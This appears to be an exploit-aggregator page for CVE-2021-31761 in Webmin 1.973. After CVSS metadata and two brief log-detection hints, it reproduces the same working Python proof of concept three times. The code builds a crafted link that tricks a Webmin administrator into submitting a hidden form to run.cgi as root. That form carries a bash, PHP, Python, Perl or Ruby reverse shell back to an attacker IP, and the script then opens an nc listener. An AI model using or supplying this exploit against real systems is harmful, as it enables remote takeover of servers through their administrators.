Description
# ..| CVE-2021-31761 |..
# Description :
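<b>Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature.</b>
Scope, from the records below: NVD lists Webmin 1.973 as affected (CWE-79, CVSS 3.1 base score 9.6, user interaction required), and the PoC header states it was tested on all versions <= 1.973. The Packet Storm, Exploit-DB and 0day.today entries title the same issue as a 'run.cgi' Cross-Site Request Forgery. The attack depends on a Webmin administrator opening a crafted link.
For detection, the PoC on this page implies two log patterns worth checking: requests to `/tunnel/link.cgi/` whose path carries URL-encoded HTML, and POSTs to `/proc/run.cgi` that arrive without a Referer header.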
Related
{"id": "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Cross-site Scripting in Webmin", "description": "# ..| CVE-2021-31761 |..\n\n# Description :\n<b>Exploiting a Reflec...", "published": "2021-04-21T19:46:43", "modified": "2021-06-20T03:50:26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-31761"], "immutableFields": [], "lastseen": "2021-12-10T15:21:33", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31761"]}, {"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}], "rev": 4}, "score": {"value": 5.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "canvas", "idList": ["WEBMIN"]}, {"type": "cve", "idList": ["CVE-2021-31761"]}, {"type": 
"exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}]}, "exploitation": null, "vulnersScore": 5.9}, "_state": {"dependencies": 1647589307, "score": 0}, "privateArea": 1}
{"packetstorm": [{"lastseen": "2021-07-20T17:19:32", "description": "", "cvss3": {}, "published": "2021-07-20T00:00:00", "type": "packetstorm", "title": "Webmin 1.973 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "PACKETSTORM:163559", "href": "https://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) \n# Date: 24/04/2021 \n# Exploit Author: Mesh3l_911 & Z0ldyck \n# Vendor Homepage: https://www.webmin.com \n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 \n# Version: Webmin 1.973 \n# Tested on: All versions <= 1.973 \n# CVE: CVE-2021-31761 \n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to \n# get a Remote Command Execution (RCE) through the Webmin's running process \n# feature \n \nimport time, subprocess,random,urllib.parse \n \n \nprint('''\\033[1;37m \n \n__ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ \n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / \n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/ \n__/ | \n|___/ \n \n\\033[1;m''') \n \nfor i in range(101): \nprint( \n\"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format( \ni), \"\\033[1;36m%\\033[1;m\", end=\"\") \ntime.sleep(0.02) \nprint(\"\\n\\n\") \n \ntarget = input( \n\"\\033[1;36m \\n Please input ur target's webmin path e.g. 
( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\") \n \nif target.endswith('/'): \ntarget = target + 'tunnel/link.cgi/' \nelse: \ntarget = target + '/tunnel/link.cgi/' \n \nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\") \n \nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\") \n \nReverseShell = input \\ \n('''\\033[1;37m \n\\n \n1- Bash Reverse Shell \\n \n2- PHP Reverse Shell \\n \n3- Python Reverse Shell \\n \n4- Perl Reverse Shell \\n \n5- Ruby Reverse Shell \\n \n\\033[1;m \n \n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''') \n \nfile_name = random.randrange(1000) \n \nif ReverseShell == '1': \nReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' \n \nelif ReverseShell == '2': \nReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' ''' \n \nelif ReverseShell == '3': \nReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' ''' \n \nelif ReverseShell == '4': \nReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' ''' \n \nelif ReverseShell == '5': \nReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' ''' \n \nelse: \nprint(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\") \n \n \ndef CSRF_Generator(): 
\nPayload = urllib.parse.quote(''' \n \n<html> \n<head> \n<meta name=\"referrer\" content=\"never\"> \n</head> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"/proc/run.cgi\" method=\"POST\"> \n<input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" /> \n<input type=\"hidden\" name=\"mode\" value=\"0\" /> \n<input type=\"hidden\" name=\"user\" value=\"root\" /> \n<input type=\"hidden\" name=\"input\" value=\"\" /> \n<input type=\"hidden\" name=\"undefined\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n \n</html> \n \n''') \n \nprint(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\") \n \nprint(target+Payload) \n \ndef Netcat_listener(): \nprint() \nsubprocess.run([\"nc\", \"-nlvp \"+port+\"\"]) \n \n \ndef main(): \nCSRF_Generator() \nNetcat_listener() \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163559/webmin1973-xsrfexec.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T18:08:01", "description": "Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-25T19:15:00", "type": "cve", "title": "CVE-2021-31761", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-12-08T20:26:00", "cpe": ["cpe:/a:webmin:webmin:1.973"], "id": "CVE-2021-31761", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31761", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2021-12-15T15:38:34", "description": "# CVE-2021-31761\n\n# Description :\n<b>Exploiting a Reflected Cros...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T20:00:09", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-31761"], "modified": "2021-12-15T14:41:56", "id": "80853E7D-3590-5E87-AD43-378E0461B3EB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:52:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "zdt", "title": "Webmin 1.973 - (run.cgi) Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "1337DAY-ID-36572", "href": "https://0day.today/exploit/description/36572", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\n# Exploit Author: Mesh3l_911 & Z0ldyck\n# Vendor Homepage: https://www.webmin.com\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\n# Version: Webmin 1.973\n# Tested on: All versions <= 1.973\n# CVE: CVE-2021-31761\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\n# get a Remote Command Execution (RCE) through the Webmin's running process\n# feature\n\nimport time, 
subprocess,random,urllib.parse\n\n\nprint('''\\033[1;37m\n\n __ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\n __/ | \n |___/ \n\n \\033[1;m''')\n\nfor i in range(101):\n print(\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\n time.sleep(0.02)\nprint(\"\\n\\n\")\n\ntarget = input(\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\n\nif target.endswith('/'):\n target = target + 'tunnel/link.cgi/'\nelse:\n target = target + '/tunnel/link.cgi/'\n\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\n\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\n\nReverseShell = input \\\n('''\\033[1;37m\n\\n\n1- Bash Reverse Shell \\n\n2- PHP Reverse Shell \\n\n3- Python Reverse Shell \\n\n4- Perl Reverse Shell \\n\n5- Ruby Reverse Shell \\n\n\\033[1;m\n\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \\033[1;m''')\n\nfile_name = random.randrange(1000)\n\nif ReverseShell == '1':\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\n\nelif ReverseShell == '2':\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\n\nelif ReverseShell == '3':\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\n\nelif ReverseShell == '4':\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\n\nelif ReverseShell == '5':\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\n\nelse:\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\n\n\ndef CSRF_Generator():\n Payload = urllib.parse.quote('''\n\n<html>\n <head>\n <meta name=\"referrer\" content=\"never\">\n </head>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"/proc/run.cgi\" method=\"POST\">\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\n <input type=\"hidden\" name=\"user\" value=\"root\" />\n <input type=\"hidden\" name=\"input\" value=\"\" />\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n\n</html>\n\n ''')\n\n print(\"\\033[1;36m\\nHere's ur link 
, send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\n\n print(target+Payload)\n\ndef Netcat_listener():\n print()\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\n\n\ndef main():\n CSRF_Generator()\n Netcat_listener()\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36572", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "exploitdb", "title": "Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31761", "CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "EDB-ID:50144", "href": "https://www.exploit-db.com/exploits/50144", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\r\n# Date: 24/04/2021\r\n# Exploit Author: Mesh3l_911 & Z0ldyck\r\n# Vendor Homepage: https://www.webmin.com\r\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\r\n# Version: Webmin 
1.973\r\n# Tested on: All versions <= 1.973\r\n# CVE: CVE-2021-31761\r\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\r\n# get a Remote Command Execution (RCE) through the Webmin's running process\r\n# feature\r\n\r\nimport time, subprocess,random,urllib.parse\r\n\r\n\r\nprint('''\\033[1;37m\r\n\r\n __ __ _ ____ _ _________ _ _ _ \r\n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \r\n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\r\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\r\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \r\n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\r\n __/ | \r\n |___/ \r\n\r\n \\033[1;m''')\r\n\r\nfor i in range(101):\r\n print(\r\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\r\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\r\n time.sleep(0.02)\r\nprint(\"\\n\\n\")\r\n\r\ntarget = input(\r\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\r\n\r\nif target.endswith('/'):\r\n target = target + 'tunnel/link.cgi/'\r\nelse:\r\n target = target + '/tunnel/link.cgi/'\r\n\r\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\r\n\r\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\r\n\r\nReverseShell = input \\\r\n('''\\033[1;37m\r\n\\n\r\n1- Bash Reverse Shell \\n\r\n2- PHP Reverse Shell \\n\r\n3- Python Reverse Shell \\n\r\n4- Perl Reverse Shell \\n\r\n5- Ruby Reverse Shell \\n\r\n\\033[1;m\r\n\r\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. 
( 1 ) > \\033[1;m''')\r\n\r\nfile_name = random.randrange(1000)\r\n\r\nif ReverseShell == '1':\r\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\r\n\r\nelif ReverseShell == '2':\r\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\r\n\r\nelif ReverseShell == '3':\r\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\r\n\r\nelif ReverseShell == '4':\r\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\r\n\r\nelif ReverseShell == '5':\r\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\r\n\r\nelse:\r\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\r\n\r\n\r\ndef CSRF_Generator():\r\n Payload = urllib.parse.quote('''\r\n\r\n<html>\r\n <head>\r\n <meta name=\"referrer\" content=\"never\">\r\n </head>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"/proc/run.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\r\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\r\n <input type=\"hidden\" name=\"user\" value=\"root\" />\r\n <input type=\"hidden\" name=\"input\" value=\"\" />\r\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n <script>\r\n 
document.forms[0].submit();\r\n </script>\r\n </body>\r\n\r\n</html>\r\n\r\n ''')\r\n\r\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\r\n\r\n print(target+Payload)\r\n\r\ndef Netcat_listener():\r\n print()\r\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\r\n\r\n\r\ndef main():\r\n CSRF_Generator()\r\n Netcat_listener()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50144", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}